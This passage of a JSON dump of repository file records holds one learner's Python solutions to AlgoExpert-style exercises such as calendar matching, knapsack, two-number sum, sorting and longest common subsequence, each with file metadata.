military_time_to_minutes(free_bounds[1]) - military_time_to_minutes(calendar[len(calendar) - 1][1]) >= meeting_Duration:\n free_intervalls.append([calendar[len(calendar) - 1][1], free_bounds[1]])\n\n else:\n return [[minutes_to_military_time(max(military_time_to_minutes(bounds1[0]), military_time_to_minutes(bounds2[0]))), minutes_to_military_time(min(military_time_to_minutes(bounds1[1]), military_time_to_minutes(bounds2[1])))]]\n\n\n return free_intervalls\n \n\ndef military_time_to_minutes(time: str)-> int:\n hour, minute = time.split(':')\n return int(hour) * 60 + int(minute)\ndef minutes_to_military_time(minutes: int)-> str:\n hour = int(minutes / 60)\n minute = minutes % 60\n string_min = str(minute)\n if str(minute) == '0':\n string_min = '00'\n\n return str(hour) + ':' + string_min\n\ncalendar2 = [\n [\"9:00\", \"10:00\"],[\"11:15\", \"11:30\"],[\"11:45\", \"17:00\"],[\"17:30\", \"19:00\"],[\"20:00\", \"22:15\"]\n ]\ncalendar1 = [\n [\"7:00\", \"7:45\"],[\"8:15\", \"8:30\"],[\"9:00\", \"10:30\"],[\"12:00\", \"14:00\"],[\"14:00\", \"15:00\"],[\"15:15\", \"15:30\"],[\"16:30\", \"18:30\"],[\"20:00\", \"21:00\"]\n ]\nbounds1 = [\"6:30\", \"22:00\"]\n\nbounds2 = [\"8:00\", \"22:30\"]\nmeeting_Duration = 30\n\nprint(calendarMatching(calendar1, bounds1, calendar2, bounds2, meeting_Duration))\n#print(military_time_to_minutes(\"10:30\"))"
},
{
"alpha_fraction": 0.5348148345947266,
"alphanum_fraction": 0.5496296286582947,
"avg_line_length": 25,
"blob_id": "c248e77f2b4fd90709880306a844f590cc34481e",
"content_id": "5bf4e62a340e210c1100dd94bedf3fc3c75753d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 675,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 26,
"path": "/Strings/RunLengthEncoding/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef runLengthEncoding(string):\n result = ''\n index = 0\n while index < len(string):\n res, string = runLength(index, string)\n result += res\n return result\n\n\t\t\ndef runLength(index: int, string: str):\n counter = 1\n elem = string[index]\n reso = ''\n while index < len(string) - 1 and counter < 9:\n if string[index + 1] == elem:\n counter += 1\n index += 1\n else:\n index += 1\n reso += str(counter) + elem\n return reso, string[index:]\n reso += str(counter) + elem\n return reso, string[index + 1:]\n\nprint(runLengthEncoding('AAAAAAAAAAAAABBCCCCDD'))"
},
{
"alpha_fraction": 0.545064389705658,
"alphanum_fraction": 0.5665236115455627,
"avg_line_length": 32.42856979370117,
"blob_id": "2f78f4a4359c35341ba249ec44590a068453bddf",
"content_id": "5bae16ef0545f799ea82446b07982067e03cbdbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 7,
"path": "/ArraysCategory/TwoNumberSum/solution_3.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(1) space\ndef twoNumberSum(array, targetSum):\n for i in range(0, len(array) - 1):\n\t for j in range(i + 1, len(array)):\n\t\t if array[i] + array[j] == targetSum:\n\t\t\t return [array[i], array[j]]\n return []"
},
{
"alpha_fraction": 0.46853145956993103,
"alphanum_fraction": 0.47902098298072815,
"avg_line_length": 27.700000762939453,
"blob_id": "123812770b802a898fadfd42615bc51a980e9fce",
"content_id": "02a7b1090bdd71b8e67fccd9e683cf9f89f550fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 286,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 10,
"path": "/Sorting/BubbleSort/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "#O(n^2) time | O(1) space\nimport math\ndef bubbleSort(array):\n for i in range(len(array)):\n for j in range(i + 1, len(array)):\n if array[i] > array[j]:\n tmp = array[i]\n array[i] = array[j]\n array[j] = tmp\n return array"
},
{
"alpha_fraction": 0.4696485698223114,
"alphanum_fraction": 0.49520766735076904,
"avg_line_length": 30.399999618530273,
"blob_id": "122032290d929b56e6bc59b03437f70e36125a74",
"content_id": "d2c5d3b5cd7b666b0a90e4a8df9f73ffbc6f1094",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 313,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/DynamicProgramming/NumberOfWaysToMakeChange/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nm) time | O(n) space where m = length(denoms)\ndef numberOfWaysToMakeChange(n, denoms):\n ways = [0 for i in range(0, n + 1)]\n ways[0] = 1\n for denom in denoms:\n for i in range(0, n + 1):\n if denom <= i:\n ways[i] += ways[i - denom]\n \n return ways[-1]"
},
{
"alpha_fraction": 0.4838709533214569,
"alphanum_fraction": 0.5139784812927246,
"avg_line_length": 34.80769348144531,
"blob_id": "a97cd61e24a03c6c6c479fa39fab20f6e3368f69",
"content_id": "0cf2703bfee6b1217d5274583aacb9d98e624f91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 930,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 26,
"path": "/DynamicProgramming/KnapsackProblem/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(capacity*len(items)) time | O(capacity) space\nimport copy\ndef knapsackProblem(items, capacity):\n weights = [elem[1] for elem in items]\n values = [elem[0] for elem in items]\n prev_caps = [[0, []] for i in range(capacity + 1)]\n curr_caps = [[0, []] for i in range(capacity + 1)]\n\n for i in range(len(weights)):\n for j in range(len(curr_caps)):\n if weights[i] <= j:\n if values[i] + prev_caps[j - weights[i]][0] >= prev_caps[j][0]:\n curr_caps[j][0] = values[i] + prev_caps[j - weights[i]][0]\n curr_caps[j][1] = list([i] + prev_caps[j - weights[i]][1])\n else:\n curr_caps[j][0] = prev_caps[j][0]\n curr_caps[j][1] = prev_caps[j][1][0:]\n prev_caps = copy.deepcopy(curr_caps)\n\n return curr_caps[-1]\n\n\nitems = [[1, 2], [4, 3], [5, 6], [6, 7]]\ncap = 10\n\nprint(knapsackProblem(items, cap))"
},
{
"alpha_fraction": 0.4367816150188446,
"alphanum_fraction": 0.4572158455848694,
"avg_line_length": 30.31999969482422,
"blob_id": "676d7e6fcde11a6b03282b6dc0a5c5a6e813a532",
"content_id": "b1ff36dd9e467037f9edcca0eae4b73bf6300630",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 783,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 25,
"path": "/ArraysCategory/FourNumberSum/my_solution2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^3) time | O(n) space\ndef fourNumberSum(array, targetSum):\n result_list = []\n array.sort()\n for i in range(len(array)):\n for j in range(i + 1, len(array)):\n left = j + 1\n right = len(array) - 1\n while left < right:\n if array[i] + array[j] + array[left] + array[right] == targetSum:\n result_list.append([array[i], array[j], array[left], array[right]])\n left += 1\n right -= 1\n elif array[i] + array[j] + array[left] + array[right] < targetSum:\n left += 1\n else:\n right -= 1\n \n return result_list\n\n\narr = [7, 6, 4, -1, 1, 2]\ntargSum = 16\n\nprint(fourNumberSum(arr, targSum))\n"
},
{
"alpha_fraction": 0.5187320113182068,
"alphanum_fraction": 0.5648415088653564,
"avg_line_length": 30.636363983154297,
"blob_id": "cbbe19b59402ae61bf35714be834cec82db16dbb",
"content_id": "ed785baf8b0e79c16afb98605bddaf4fed8a7d63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 347,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/Recursion/ProductSum/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(d) space where d is the greatest depth\ndef productSum(array, depth=1, idx=0):\n result = 0\n for elem in array:\n if type(elem) is list:\n result += (depth + 1) * productSum(elem, depth + 1, 0)\n else: result += elem\n return result\narray = [5, 2, [7, -1], 3, [6, [-13, 8], 4]]\n\nprint(productSum(array))"
},
{
"alpha_fraction": 0.5654362440109253,
"alphanum_fraction": 0.5788590312004089,
"avg_line_length": 30.421052932739258,
"blob_id": "5c9f770af1b490face506c6b6a18bb15576c045a",
"content_id": "31553c2b83e2222164f128a80a968fdf4b09a78a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 596,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 19,
"path": "/ArraysCategory/ThreeNumberSum/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(n) space\ndef threeNumberSum(array, targetSum):\n result_triplets = []\n array.sort()\n for index in range(len(array) - 2):\n\t left = index + 1\n\t right = len(array) - 1\n\t\t\n\t while left < right:\n\t\t if array[index] + array[left] + array[right] == targetSum:\n\t\t\t result_triplets.append([array[index], array[left], array[right]])\n\t\t\t left += 1\n\t\t\t right -= 1\n\t\t elif array[index] + array[left] + array[right] < targetSum:\n\t\t\t left += 1\n\t\t elif array[index] + array[left] + array[right] > targetSum:\n\t\t\t right -= 1\n\t\t\t\t\n return result_triplets"
},
{
"alpha_fraction": 0.5260416865348816,
"alphanum_fraction": 0.5703125,
"avg_line_length": 26.5,
"blob_id": "0c9359c322de8f0012bce626928a822b0c95ec09",
"content_id": "eac98ac2dab087577c3fa059d50337e2f705d84c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 14,
"path": "/Greedy/MinimumWaitingTime/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def minimumWaitingTime(queries):\n if len(queries) == 1:\n return queries[0]\n queries.sort()\n biggest = queries[-1]\n for i in range(len(queries) - 1, 0, -1):\n queries[i] = queries[i - 1]\n queries[0] = biggest\n summ = 0\n for i in range(1, len(queries)):\n summ += sum(queries[1: i + 1])\n return summ\n\nprint(minimumWaitingTime([3, 2, 1, 2, 6]))"
},
{
"alpha_fraction": 0.4739638566970825,
"alphanum_fraction": 0.4877789616584778,
"avg_line_length": 26.676469802856445,
"blob_id": "7971890e108ca94421e02910aeb02ac15f077b2b",
"content_id": "860c719e0801978cfb71a11529a48b4927474206",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 941,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 34,
"path": "/ArraysCategory/LargestRange/my_solution2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef largestRange(array):\n elements = {}\n for elem in array:\n elements[elem] = True\n \n result_range = []\n tmp_range = []\n \n for elem in array:\n if elem not in result_range:\n left_range = []\n middle_range = [elem]\n right_range = []\n tmp_elem = elem\n while tmp_elem - 1 in elements:\n left_range.append(tmp_elem - 1)\n tmp_elem = tmp_elem - 1\n tmp_elem = elem\n while tmp_elem + 1 in elements:\n right_range.append(tmp_elem + 1)\n tmp_elem = tmp_elem + 1\n\n tmp_range = left_range + middle_range + right_range\n tmp_range.sort()\n\n if len(tmp_range) > len(result_range):\n result_range = tmp_range[0:]\n \n return [result_range[0], result_range[-1]]\n\narr = [4, 2, 1, 3]\n\nprint(largestRange(arr))\n"
},
{
"alpha_fraction": 0.50352942943573,
"alphanum_fraction": 0.5364705920219421,
"avg_line_length": 24.058822631835938,
"blob_id": "932e76a61dc44b47d1d6bf62f0d10682696d7bf7",
"content_id": "9a43dc693c2028b337e96d7fa40035a69f324744",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 17,
"path": "/ArraysCategory/MinRewards/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef minRewards(scores):\n rewards = [1 for i in range(len(scores))]\n\n for i in range(1, len(scores)):\n if scores[i] > scores[i - 1]:\n rewards[i] = rewards[i - 1] + 1\n\n for i in reversed(range(len(scores) - 1)):\n if scores[i] > scores[i + 1]:\n rewards[i] = max(rewards[i], rewards[i + 1] + 1)\n\n return sum(rewards)\n\narr = [0, 4, 2, 1, 3]\n\nminRewards(arr)"
},
{
"alpha_fraction": 0.5677530169487,
"alphanum_fraction": 0.5774728655815125,
"avg_line_length": 34,
"blob_id": "2e73b398f7e3b052edd25e5528cfa5a8a2faafa6",
"content_id": "e0b0c62d97324c39781d5678d0696c443e817133",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1749,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 50,
"path": "/ArraysCategory/ApartmentHunting/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(ba) time | O(ba) where b = number of block and a = number of attributes\ndef apartmentHunting(blocks, reqs):\n building_distances = []\n for req in reqs:\n building_distances.append(get_distances_for_req(req, blocks))\n\n best_block_area = -1\n min_distance = float('inf')\n for index in range(len(blocks)):\n max_distance = -1\n for building in building_distances:\n max_distance = max(max_distance, building[index])\n if max_distance < min_distance:\n min_distance = max_distance\n best_block_area = index\n\n return best_block_area\n\n\n\ndef get_distances_for_req(req, blocks):\n distances = [float('inf') for i in range(len(blocks))]\n\n for index, block in enumerate(blocks, 0):\n if block[req]:\n distances[index] = 0\n else:\n if index - 1 >= 0:\n if distances[index - 1] != float('inf'):\n distances[index] = distances[index - 1] + 1\n\n for index in range(len(distances) - 2, -1, -1):\n if distances[index] != float('inf') and distances[index + 1] < distances[index]:\n distances[index] = distances[index + 1] + 1\n elif distances[index] == float('inf'):\n distances[index] = distances[index + 1] + 1\n \n return distances\n\nblocks = [\n {\"gym\": False, \"office\": True, \"school\": True, \"store\": False},\n {\"gym\": True, \"office\": False, \"school\": False, \"store\": False},\n {\"gym\": True, \"office\": False, \"school\": True, \"store\": False},\n {\"gym\": False, \"office\": False, \"school\": True, \"store\": False},\n {\"gym\": False, \"office\": False, \"school\": True, \"store\": True}\n ]\nreqs = [\"gym\", \"office\", \"school\", \"store\"]\n\n\nprint(apartmentHunting(blocks, reqs))"
},
{
"alpha_fraction": 0.6193895936012268,
"alphanum_fraction": 0.6211849451065063,
"avg_line_length": 23.2608699798584,
"blob_id": "c7605cbb209a4aa7f2120a7e26b5714f01c6a68b",
"content_id": "3f3c3cfb84c9ea4e973f938967d97cc4d01c905d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 557,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 23,
"path": "/BinaryTrees/BranchSums/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# This is the class of the input root. Do not edit it.\nclass BinaryTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n\ndef branchSums(root) -> list:\n sums = []\n calculateSum(root, 0, sums)\n return sums\n\ndef calculateSum(root, currSum: float, sums: list):\n if root == None:\n return\n\n currSum += root.value\n if root.left == None and root.right == None:\n sums.append(currSum)\n\n calculateSum(root.left, currSum, sums)\n calculateSum(root.right, currSum, sums)"
},
{
"alpha_fraction": 0.6476964950561523,
"alphanum_fraction": 0.6612465977668762,
"avg_line_length": 23.66666603088379,
"blob_id": "315d0c17c593c3dfbb608d983f82f7ef630101d6",
"content_id": "806a15f2cecc6c6b342a399ed6f26fdfe1bb3550",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 369,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 15,
"path": "/ArraysCategory/TwoNumberSum/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nlog(n)) time | O(1) space\ndef twoNumberSum(array, targetSum):\n\tarray.sort()\n\tleft = 0\n\tright = len(array) - 1\n\t\n\twhile array[left] < array[right]:\n\t\tpotentialSum = array[left] + array[right]\n\t\tif potentialSum == targetSum:\n\t\t\treturn [array[left], array[right]]\n\t\telif potentialSum < targetSum:\n\t\t\tleft += 1\n\t\telif potentialSum > targetSum:\n\t\t\tright -= 1\n\treturn []"
},
{
"alpha_fraction": 0.45501023530960083,
"alphanum_fraction": 0.49284252524375916,
"avg_line_length": 36.653846740722656,
"blob_id": "7c439b9e7d023d8c0d9974ac4cd54e81dd11e963",
"content_id": "e67d983e98f33a9869c466114b7c7f0c78ed33ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 978,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 26,
"path": "/DynamicProgramming/MinNumberOfJumps/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef minNumberOfJumps(array):\n number_of_jumps = 0\n i = 0\n while i < len(array) - 1:\n if array[i] + i >= len(array) - 1:\n return number_of_jumps + 1\n possible_elems = array[i + 1: i + array[i] + 1]\n step_sum = i + array[i]\n index_to_step = i + array[i]\n for j in range(len(possible_elems)):\n if possible_elems[j] + (i + j + 2 - (i + 1)) >= len(array) - (i + 1):\n return number_of_jumps + 2\n if i + 1 + possible_elems[j] > len(array) - 1:\n return number_of_jumps + 2\n if possible_elems[j] + array[i + 1 + possible_elems[j]] > step_sum:\n step_sum = possible_elems[j] + array[i + 1 + possible_elems[j]]\n index_to_step = i + (j + 1)\n i = index_to_step\n number_of_jumps += 1\n return number_of_jumps\n\n\n\narr = [3, 10, 2, 1, 2, 3, 7, 1, 1, 1, 3, 2, 3, 2, 1, 1, 1, 1]\nprint(minNumberOfJumps(arr))"
},
{
"alpha_fraction": 0.5439330339431763,
"alphanum_fraction": 0.5564853549003601,
"avg_line_length": 20.727272033691406,
"blob_id": "acfbe3d456e9315dde82e270cb6d8092c7c98266",
"content_id": "545df3438941e5276de1fc99ba5fa990858ec5a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 239,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 11,
"path": "/ArraysCategory/MonotonicArray/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "def isMonotonic(array):\n inc = True\n dec = True\n\t\n for index in range(1, len(array)):\n\t if array[index] < array[index - 1]:\n\t\t inc = False\n\t if array[index] > array[index - 1]:\n\t\t dec = False\n\t\t\t\n return inc or dec\n"
},
{
"alpha_fraction": 0.3919062912464142,
"alphanum_fraction": 0.44302448630332947,
"avg_line_length": 30.33333396911621,
"blob_id": "422d5106f790201ce94e09f7e1508c281f533805",
"content_id": "a3825a5aef6e79238f2b6b8ce31b7c36c85effcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 939,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 30,
"path": "/DynamicProgramming/LongestCommonSubsequence/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(nm) time | O(nm) space\ndef longestCommonSubsequence(str1, str2):\n lcs = [[[None, 0, None, None] for i in range(len(str1) + 1)] for j in range(len(str2) + 1)]\n\n for i in range(1, len(str2) + 1):\n for j in range(1, len(str1) + 1):\n if str2[i - 1] == str1[j - 1]:\n lcs[i][j] = [str2[i - 1], lcs[i - 1][j - 1][1] + 1, i - 1, j - 1] \n else:\n if lcs[i][j - 1][1] > lcs[i - 1][j][1]:\n lcs[i][j] = [None, lcs[i][j - 1][1], i, j - 1]\n else:\n lcs[i][j] = [None, lcs[i - 1][j][1], i - 1, j]\n\n\n result = []\n i = len(lcs) - 1\n j = len(lcs[0]) - 1\n while i != 0 and j != 0:\n curr = lcs[i][j]\n if curr[0] is not None:\n result.append(curr[0])\n i = curr[2]\n j = curr[3]\n\n return list(reversed(result))\nstr1 = \"XKYKZPW\"\nstr2 = \"ZXVVYZW\"\n\nprint(longestCommonSubsequence(str1, str2))"
},
{
"alpha_fraction": 0.4735516309738159,
"alphanum_fraction": 0.50629723072052,
"avg_line_length": 29.615385055541992,
"blob_id": "85a56f266f9a63290a52338dd8039ee911f8e098",
"content_id": "7b6db48ece81b7514a968bad800f512053f481fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 397,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 13,
"path": "/DynamicProgramming/MinNumberOfJumps/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(1) space\ndef minNumberOfJumps(array):\n max_reach = array[0]\n steps = array[0]\n jumps = 0\n if len(array) == 0 or len(array) == 1: return 0\n for i in range(1, len(array)):\n if i == len(array) - 1: return jumps + 1\n max_reach = max(max_reach, array[i] + i)\n steps -= 1\n if steps == 0:\n jumps += 1\n steps = max_reach - i"
},
{
"alpha_fraction": 0.6063122749328613,
"alphanum_fraction": 0.6320598125457764,
"avg_line_length": 37.870967864990234,
"blob_id": "dec114f8dad7ab80c66e311574b47d397f7446eb",
"content_id": "b2f18b65cf76d6de746a1a39c4b8bff296e24cd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1204,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 31,
"path": "/ArraysCategory/SpiralTraverse/my_solution_2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef spiralTraverse(array):\n output_array = []\n fill_with_perimeters(array, 0, 0, len(array) - 1, len(array[0]) - 1, output_array)\n return output_array\n\n\ndef fill_with_perimeters(array, up_row_index, left_column_index, down_row_index, right_column_index, \n\t\t\t\t\t output_array):\n if left_column_index > right_column_index or up_row_index > down_row_index: return\n for i in range(left_column_index, right_column_index + 1):\n\t output_array.append(array[up_row_index][i])\n\n for i in range(up_row_index, down_row_index):\n output_array.append(array[i + 1][right_column_index])\n\t\t\n for i in range(right_column_index, left_column_index, -1):\n if up_row_index != down_row_index:\n\t output_array.append(array[down_row_index][i - 1])\n\t\t\n for i in range(down_row_index, up_row_index + 1, -1):\n if right_column_index != left_column_index:\n\t output_array.append(array[i - 1][left_column_index])\n\t\t\n fill_with_perimeters(array, up_row_index + 1, left_column_index + 1, down_row_index - 1,\n\t\t\t\t\t\tright_column_index - 1, output_array)\n\narr = [ [1, 2, 3, 4], \n [10, 11, 12, 5], \n [9, 8, 7, 6]]\nprint(spiralTraverse(arr))"
},
{
"alpha_fraction": 0.46700507402420044,
"alphanum_fraction": 0.4885786771774292,
"avg_line_length": 29.30769157409668,
"blob_id": "dcd8d9f6cc7c21aced654609a6642130c939e000",
"content_id": "1b08e8ca714db0ccd88a02d9ca52ea94a99dbab5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 788,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 26,
"path": "/ArraysCategory/LargestRange/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n^2) time | O(1) space\ndef largestRange(array):\n \n \n min_elem = min(array)\n max_elem = max(array)\n \n result = [min_elem, min_elem]\n tmp = [min_elem, min_elem]\n for elem in range(min_elem + 1, max_elem + 1):\n if elem in array:\n tmp[1] = elem\n else:\n distance_result = result[1] - result[0]\n distance_tmp = tmp[1] - tmp[0]\n if distance_tmp > distance_result:\n result = tmp[0:]\n tmp.clear()\n tmp.append(elem + 1)\n tmp.append(elem + 1)\n if elem == max_elem:\n distance_result = result[1] - result[0]\n distance_tmp = tmp[1] - tmp[0]\n if distance_tmp > distance_result:\n result = tmp[0:]\n return result\n"
},
{
"alpha_fraction": 0.4815518260002136,
"alphanum_fraction": 0.5355398654937744,
"avg_line_length": 34.79611587524414,
"blob_id": "71ba90f4eafbd6b3027a49a148e8f860ff63dc1f",
"content_id": "9ed7e12fe1aba6cecabdd507aaae1e45bc044ddd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3686,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 103,
"path": "/ArraysCategory/CalendarMatching/solution_1.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(c1 + c2) time | O(c1 + c2) space where c1 = calendar1 and c2 = calendar2 length\ndef calendarMatching(calendar1: list, bounds1: list, calendar2: list, bounds2: list, meeting_Duration: int)-> list:\n i = 0\n j = 0\n\n new_calendar1 = [['0:00', bounds1[0]]] + calendar1 + [[bounds1[1], '23:59']]\n new_calendar2 = [['0:00', bounds2[0]]] + calendar2 + [[bounds2[1], '23:59']]\n\n calendar = []\n last_appended_index = -1\n\n while i < len(new_calendar1) and j < len(new_calendar2):\n start1 = military_time_to_minutes(new_calendar1[i][0])\n start2 = military_time_to_minutes(new_calendar2[j][0])\n\n end1 = military_time_to_minutes(new_calendar1[i][1])\n end2 = military_time_to_minutes(new_calendar2[j][1])\n\n if len(calendar) != 0:\n last_end = military_time_to_minutes(calendar[last_appended_index][1])\n else: last_end = -10\n\n\n if start1 <= start2:\n if start1 < last_end and end1 > last_end:\n calendar[last_appended_index][1] = minutes_to_military_time(end1)\n i += 1\n continue\n elif start1 < last_end and end1 < last_end:\n i += 1\n continue\n new_start = start1\n if end1 < start2:\n new_end = end1\n calendar.append([minutes_to_military_time(new_start), minutes_to_military_time(new_end)])\n last_appended_index += 1\n i += 1\n else:\n new_end = max(end1, end2)\n calendar.append([minutes_to_military_time(new_start), minutes_to_military_time(new_end)])\n last_appended_index += 1\n i += 1\n j += 1\n else:\n if start2 < last_end and end2 > last_end:\n calendar[last_appended_index][1] = minutes_to_military_time(end2)\n j += 1\n continue\n elif start2 < last_end and end2 < last_end:\n j += 1\n continue\n new_start = start2\n if end2 < start1:\n new_end = end2\n calendar.append([minutes_to_military_time(new_start), minutes_to_military_time(new_end)])\n last_appended_index += 1\n j += 1\n else:\n new_end = max(end1, end2)\n calendar.append([minutes_to_military_time(new_start), minutes_to_military_time(new_end)])\n last_appended_index += 1\n i += 1\n j += 1\n\n for index in range(i, len(new_calendar1)):\n calendar.append(new_calendar1[index])\n for index in range(j, len(new_calendar2)):\n calendar.append(new_calendar2[index])\n\n result = []\n for i in range(len(calendar) - 1):\n if military_time_to_minutes(calendar[i + 1][0]) - military_time_to_minutes(calendar[i][1]) >= meeting_Duration:\n result.append([calendar[i][1], calendar[i + 1][0]])\n\n return result\n\ndef military_time_to_minutes(time: str)-> int:\n hour, minute = time.split(':')\n return int(hour) * 60 + int(minute)\ndef minutes_to_military_time(minutes: int)-> str:\n hour = int(minutes / 60)\n minute = minutes % 60\n string_min = str(minute)\n if str(minute) == '0':\n string_min = '00'\n\n return str(hour) + ':' + string_min\n\ncalendar1 = [\n [\"10:00\", \"10:30\"],\n [\"10:45\", \"11:15\"],\n [\"11:30\", \"13:00\"],\n [\"14:15\", \"16:00\"],\n [\"16:00\", \"18:00\"]\n ]\n\ncalendar2 = [[\"10:00\", \"11:00\"], [\"10:30\", \"16:30\"]]\nbounds1 = [\"9:30\", \"20:00\"]\n\nbounds2 = [\"9:00\", \"22:30\"]\nmeeting_Duration = 60\n\nprint(calendarMatching(calendar1, bounds1, calendar2, bounds2, meeting_Duration))"
},
{
"alpha_fraction": 0.5014662742614746,
"alphanum_fraction": 0.5190615653991699,
"avg_line_length": 30.090909957885742,
"blob_id": "3c72b9b324b87e5bfe212816c942ba258080fb38",
"content_id": "8e268b5b13f41578832d7443ea60a8bec331256e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 341,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/Sorting/InsertionSort/my_solution.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "#O(n)-best O(n)-avarage time | O(1) space\ndef insertionSort(array: list) -> list:\n for i in range(1, len(array)):\n j = i\n while j > 0 and array[j] < array[j - 1]:\n swap(j, j - 1, array)\n j -= 1\n return array\n\ndef swap(i: int, j: int, array: list) -> None:\n array[i], array[j] = array[j], array[i]"
},
{
"alpha_fraction": 0.5680751204490662,
"alphanum_fraction": 0.5680751204490662,
"avg_line_length": 22.77777862548828,
"blob_id": "ef8a0f28469e641a1bf0f92dcba503558a1c6daf",
"content_id": "2e550bc2949b57ec67f070ec0e5419696b91940e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 213,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 9,
"path": "/ArraysCategory/TwoNumberSum/solution_2.py",
"repo_name": "peterbarla/AlgoExpertExercises",
"src_encoding": "UTF-8",
"text": "# O(n) time | O(n) space\ndef twoNumberSum(array, targetSum):\n nums = {}\n for num in array:\n\t if targetSum - num in nums:\n\t\t return [num, targetSum - num]\n\t else:\n\t\t nums[num] = True\n return []"
},
{
"alpha_fraction": 0.6376495957374573,
"alphanum_fraction": 0.6474428772926331,
"avg_line_length": 28.645160675048828,
"blob_id": "55ca855408c97ac8cf0cdca85af9d3eb18637e6f",
"content_id": "c3bd96646738ec96092cfb74d8b98b4fb704d105",
"detected_licenses": [],
